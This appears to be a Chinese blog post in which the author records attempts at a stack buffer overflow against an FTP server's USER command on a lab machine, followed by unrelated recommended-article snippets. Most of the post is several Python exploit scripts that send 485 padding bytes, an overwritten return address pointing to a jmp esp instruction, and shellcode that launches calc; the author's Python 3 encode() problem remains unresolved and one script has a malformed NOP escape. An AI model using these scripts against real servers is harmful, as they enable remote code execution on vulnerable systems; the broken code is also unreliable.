从脚本编写中学到的encode函数坑(未解决)

最新推荐文章于 2025-11-22 14:51:21 发布
原创 最新推荐文章于 2025-11-22 14:51:21 发布 · 838 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

在尝试填充EIP数值的过程中,作者遇到了使用encode函数导致的未解决问题。文章详细描述了从无限接近成功的状态,到因encode函数而出现的转折,以及后续计划通过研究Python生成的可执行程序和利用调试器来解决此问题。

开篇 无限接近成功

import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\x45\x44\x43\x42"+buf1
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)

在这里插入图片描述
数字准确填充EIP

铺垫 离奇的填充EIP数值

在这里插入图片描述
             不使用encode函数引起报错

# 神秘c2填充地址中间代码
import socket

buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\x7B\x46\x86\x7C"+"A"*4+buf1   #此地址为kernel32中jmp esp指令所在
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)

在这里插入图片描述

#c3填充首字节
import socket

buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1    #
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)

在这里插入图片描述

转折 目标锁定encode函数

#2.7下编译通过  3.5失败
import socket

buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1    #
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str  = "User "
str += "A"*485
str += "\xD7\x30\x5A\x7D"
str += "\90"*10
str += "\r\n"
# str=str.encode()
s.send(str)

在这里插入图片描述

  已查阅关于python相关文档,但对encode()函数底层编译实现未有太多解释 后续填坑考虑使用python生成可执行程序 通过IDA和调试器解决填充问题

matlab实现语音信号的74汉明编码译码过程
Terruic的博客
05-31 1058
噪音 rand1是每行增加0-1为错误,rand2是每行增加2或更多个错误,可以改函数参数。%根据伴随式找到错误图案。E=check(S);%根据伴随式找到错误图案。% 将语音数据转换为二进制序列。% 将二进制序列转换回语音数据。%% 提取数据并做数值转换。%% 通信信道模型部分。
encode函数matlab,Block encoder
weixin_39526546的博客
03-21 2034
Set the values of the codeword length and message length.n = 15; % Codeword lengthk = 5; % Message lengthCreate a random binary message with length equal to the message length.data = randi([0 1],k,1);...
Matlab的卷积编码完整的系统-encode_convol.m
08-13
Matlab的卷积编码完整的系统-encode_convol.m 利用 bpsk调制 高斯信道 卷积码 分析系统性能的 完整程序
matlab encode (7,4)汉明码
m0_53820941的博客
03-28 1060
看这个文章要注意,u1实际上指的是上述最右边的一位,不是最左边的。搞不懂为什么和网上一堆汉明码编码方式不一样。
socket编程流程与函数(实用篇)
qq_42824983的博客
06-14 2531
首先要明白,三元组可以标识唯一主机的唯一应用程序,网络中进程的通信就可以利用三元组的标志与其他进程之间进行交互。三元组是:ip地址、端口号和连接(通讯链路)。或者也可以说是五元组:(协议,本地地址,本地端口号,远地地址,远地端口号) socket编程建立连接的流程如下: 1.什么是socket 网络中的进程是利用socket来进行通信的。socket对于linux/Unix来说是一个特殊的文件,一些socket函数会进行读写io、关闭、打开等功能 2.socket的基本操作 2.1 socket()函数
实现两个函数encode()和decode()
ggcaozheng的专栏
05-10 4284
今天去面试,碰到一个机试题,当时制作出来了正向转换,逆向的没做出来,回来以后,查了下网络,也是正向转换有答案,可是最难的逆向的还是没找到,花了1个多小时,重新把题目做了一下。这是题目:请你用java,c,c++ 中任何一种语言实现两个函数encode()和decode(),分别实现对字符串的变换和复原。  变换函数encode()顺序考察以知字符串的字符,按以下规则逐组生成新字符串:  (1)若已
CMWrun脚本编写进阶:从入门到精通的必学技巧揭秘
[CMWrun脚本编写进阶:从入门到精通的必学技巧揭秘](https://cdn.rohde-schwarz.com/pws/application/cards/3606_8243/cmwrun-device-coexistence-testing_ac_3606-8243-92_02_w900_hX.png) # 摘要 CMWrun脚本是一...
【FieldSpec4脚本编写】:自动化脚本编写与管理:掌握自动化脚本编写,提升工作效率
[【FieldSpec4脚本编写】:自动化脚本编写与管理:掌握自动化脚本编写,提升工作效率](https://docs.omniverse.nvidia.com/extensions/latest/_images/ext_python-scripting-component-select-assets.png) ...
【coze工作流脚本编写基础】:自动化脚本编写初学者指南
我们会从工作流脚本的基本功能出发,到它们如何与不同系统和应用交互,以及如何编写出既高效又可维护的脚本。希望通过本章的介绍,读者能对工作流脚本编写有一个整体的认识,并为后续章节更深入的学习打下
【Coze脚本编写技巧】:编写视频生成脚本的高效策略
在当今的IT行业中,脚本编写已成为自动化和优化工作流程的重要手段。Coze作为一种新兴的脚本语言,它以简洁、高效而著称,在众多IT领域中得到广泛应用。本章将带您走进Coze脚本的编写基础,帮助您打下坚实的脚本编程...
41、网络实验室搭建与配置:从GNS3到Python脚本实践
最新发布
ppp33的博客
11-22 20
本文详细介绍了如何搭建和配置基于GNS3的网络实验室,涵盖Microsoft Loopback Adapter的安装与设置、GNS3中Cisco设备的连接与通信测试、常见通信问题的故障排除方法,以及使用Python脚本通过Telnet自动化配置IOS路由器。同时提供了多设备批量配置、脚本优化和安全加固等进阶实践,帮助读者实现高效、可靠的网络实验环境搭建与管理。
encode() decode() 编码解码函数
python编程
08-30 5548
encode() decode() s = '你好' bs = s.encode('utf-8') # 把s从unicode编码方式转换成utf-8的编码方式, print(bs) s1 = bs.decode('utf-8') # 解码成unicode编码 print(s1) > b'\xe4\xbd\xa0\xe5\xa5\xbd' # 中文一个字符占三个字节 你好 ...
【基础教程】Python转义字符及用法
matinal 當冬夜漸暖 。公众号:matinal
05-08 1890
ASCII 编码为每个字符都分配了唯一的编号,称为编码值。在 Python 中,一个 ASCII 字符除了可以用它的实体(也就是真正的字符)表示,还可以用它的编码值表示。这种使用编码值来间接地表示字符的方式称为转义字符(Escape Character)。 转义字符以\0或者\x开头,以\0开头表示后跟八进制形式的编码值,以\x开头表示后跟十六进制形式的编码值,Python 中的转义字符只能...
转义字符
不依法度的博客
12-05 1360
字符集(Character Set)为每个字符分配了唯一的编号,我们不妨将它称为编码值。在C语言中,一个字符除了可以用它的实体(也就是真正的字符)表示,还可以用编码值表示。这种使用编码值来间接地表示字符的方式称为转义字符(Escape Character)。 转义字符以\或者\x开头,以\开头表示后跟八进制形式的编码值,以\x开头表示后跟十六进制形式的编码值。对于转义字符来说,只能使用八进制或者十六进制。 字符 1、2、3、a、b、c 对应的 ASCII 码的八进制形式分别是 61、62、63、141、14
格式化字符串漏洞
qq_43613144的博客
07-27 442
格式化字符串漏洞 格式化字符串漏洞原理 首先了解一下什么是格式化字符串:格式化字符串是用来告诉程序如何进行格式化输出的说明符。 引用参考文件的内容 %c:输出字符,配上%n可用于向指定地址写数据。 %d:输出十进制整数,配上%n可用于向指定地址写数据。 %x:输出16进制数据,如%i$x表示要泄漏偏移i处4字节长的16进制数据,%i$lx表示要泄漏偏移i处8字节长的16进制数据,32bit...
循环码编码与译码(MATLAB实现)
热门推荐
weixin_45115771的博客
07-04 1万+
循环码是一类满足循环特性的线性分组码,线性分组码对码的选取做了线性约束,而循环码是在线性约束的基础上增加了满足循环性的约束条件,是线性分组码的子类。下面以二元循环码进行说明。 由于 (n,k,d) 线性分组码是 n 维线性空间 Vn 的一个线性子空间 Vn,k ,如果对于 n 重子空间 Vn,k,任何一个 V=(Vn-1,Vn-2,…,V0)∈Vn,k,恒有 V1=(Vn-2,Vn-3,…,V0,Vn)∈Vn,k,则称 Vn,k 为循环子空间或循环码。 实际上,对于一个 (n,k,d) 线性分组码,若其任一
Matlab通信仿真系列——线性分组码之循环码、BCH码、RS码仿真
小灰灰的FPGA的博客
12-23 3631
RS码,通过选择一个合适的生成多项式g(x),并使得对每个信息段计算得到的码字多项式都是g(x)的倍式,也就是码字多项式除以g(x)的余式为0。decoded=rsdec(code,n,k,genpoly)表示对应code=rsenc(msg,n,k,genpoly)的译码。RS(n,k)码可以由m、n和k三个参数表示,其中m表示码元符号取自域GF(2^m),n表示码字长度,k表示信息段长度。decoded=rsdec(code,n,k)表示对应code=rsenc(msg,n,k)的译码。
Matlab实现 维特比译码
fms2000的博客
06-12 7690
利用matlab实现维特比译码 话不多说,直接展示代码 首先是利用卷积码进行编码 然后加入awgn噪声 最后利用维特比译码 绘制误比特率图像 卷积码进行编码 %% 初始化参数 N = 1000; %序列长度 code_in = randi(2,1,N)-1; %code_in = [1,1,0,1,1,1,0,0,1]; N = length(code_in); g1 = [1,1,1]; g2 = [1,0,1]; %% 计算 卷积码 %x_g1 x0 = g1(1) * code_in;
python常用的十进制、16进制、字符串、字节串之间的转换
BAIFOL的博客
11-20 759
进行协议解析时,总是会遇到各种各样的数据转换的问题,从二进制到十进制,从字节串到整数等等 废话不多上,直接上例子 整数之间的进制转换: 10进制转16进制: hex(16) ==> 0x10 16进制转10进制: int('0x10', 16) ==> 16 类似的还有oct(), bin() ------------------- 字符串转整数: 10进制字符串: int('10') ==> 10 16进制字符串: int('10', 16) ==>...
EnCode/DeCode转换工具:支持ANSI与UTF-8编码转换
对于从事SEO优化、网络营销、自动化脚本编写的技术人员而言,也常需处理URL中的参数编码问题;而对于初学者来说,这款工具还能帮助理解字符编码的基本原理,加深对Web数据传输机制的认识。例如,在学习HTML表单提交...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值